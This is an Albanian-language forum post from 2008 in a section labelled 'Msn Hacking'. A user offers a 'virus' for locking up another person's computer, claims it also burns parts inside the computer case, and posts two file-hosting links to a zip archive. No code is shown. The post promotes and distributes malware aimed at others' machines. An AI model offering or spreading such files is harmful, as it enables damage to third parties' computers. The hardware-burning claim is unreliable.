dia-miki.tk

Bashkepuntore:arberzhu-bi.the-up.com
 
ForumForum  PytėsoriPytėsori  KėrkoKėrko  Lista AnėtarėveLista Anėtarėve  Grupet e AnėtarėveGrupet e Anėtarėve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 Ne qofte se doni qe ta djegni kompjuterin

Shko poshtė 
AutoriMesazh
diamant
Udheheqes i forumit
avatar

Numri i postimeve : 65
Join date : 06/03/2008
Age : 22

MesazhTitulli: Ne qofte se doni qe ta djegni kompjuterin   Fri Mar 07, 2008 7:55 pm

Ne qofte se doni qe t'ia bllokoni kompjuterin dikuj ky eshte nje virus shume i trrent.

Ne qofte se pyetni per qka vlen ky virus, ky vlen per bllokimin e kompjuterit si dhe ben djegjen e shume pjeseve ne brendesi te shtepizes.Ky virus natyrisht duhet te qohet me WinZip ose me WinRar.Ja linku

http://rapidshare.de/files/11577198/virues.zip.html
http://www.speedyshare.com/543114678.html
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://dia-miki.piczo.com
 
Ne qofte se doni qe ta djegni kompjuterin
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
dia-miki.tk :: Gjera te ndryshme :: Msn Hacking-
Kėrce tek: